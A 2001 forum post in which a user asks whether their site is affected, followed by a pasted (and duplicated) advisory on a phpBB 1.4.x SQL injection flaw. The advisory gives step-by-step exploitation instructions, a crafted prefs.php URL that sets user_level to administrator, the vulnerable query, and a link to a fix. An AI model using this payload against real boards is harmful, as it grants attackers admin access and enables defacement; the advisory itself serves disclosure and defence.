wbierman
17th August 2001, 14:43
Are we affected by any of this?
phpBB Exploit Released and Being Used
--------------------------------------
phpBB is an open source bulletin board program that uses
a MySQL database backend and provides support for public
and private forums. (See http://www.phpbb.com/)
A little over a week ago, kill-9 of modernhackers.com posted
a phpBB 1.4.x exploit that can give remote attackers
administrative access to a vulnerable bulletin board.
http://archives.neohapsis.com/archives/bugtraq/2001-08/0056.html
Simple step-by-step instructions on how to exploit the
vulnerability are provided:
1. Register an account on a phpBB board version 1.4.x.
2. Enter the URL given below. Replace "sitename" with
the real site name, and replace l337h4x0r with your
username.
3. Click on "Administration Panel" near the bottom of
the page.
Example URL:
http://sitename/phpBBfolder/prefs.php?save=1
&viewemail=1',user_level%3D'4'%20where%20username%3 D'l337h4x0r'%23
The problem is due to inadequate checking of user input.
The URL above inserts an extra section:
,user_level='4' where username='l337h4x04'
into an SQL statement in prefs.php via the $viewemail variable:
$sql_query = "UPDATE users SET
user_viewemail='$viewemail',
user_theme='$themes',
user_attachsig='$sig', ...
This hack is actively being used to deface phpBB 1.4.x
bulletin board -based websites.
A suggested fix has been posted here:
http://archives.neohapsis.com/archives/bugtraq/2001-08/0060.html
phpBB Exploit Released and Being Used
--------------------------------------
phpBB is an open source bulletin board program that uses
a MySQL database backend and provides support for public
and private forums. (See http://www.phpbb.com/)
A little over a week ago, kill-9 of modernhackers.com posted
a phpBB 1.4.x exploit that can give remote attackers
administrative access to a vulnerable bulletin board.
http://archives.neohapsis.com/archives/bugtraq/2001-08/0056.html
Simple step-by-step instructions on how to exploit the
vulnerability are provided:
1. Register an account on a phpBB board version 1.4.x.
2. Enter the URL given below. Replace "sitename" with
the real site name, and replace l337h4x0r with your
username.
3. Click on "Administration Panel" near the bottom of
the page.
Example URL:
http://sitename/phpBBfolder/prefs.php?save=1
&viewemail=1',user_level%3D'4'%20where%20username%3 D'l337h4x0r'%23
The problem is due to inadequate checking of user input.
The URL above inserts an extra section:
,user_level='4' where username='l337h4x04'
into an SQL statement in prefs.php via the $viewemail variable:
$sql_query = "UPDATE users SET
user_viewemail='$viewemail',
user_theme='$themes',
user_attachsig='$sig', ...
This hack is actively being used to deface phpBB 1.4.x
bulletin board -based websites.
A suggested fix has been posted here:
http://archives.neohapsis.com/archives/bugtraq/2001-08/0060.html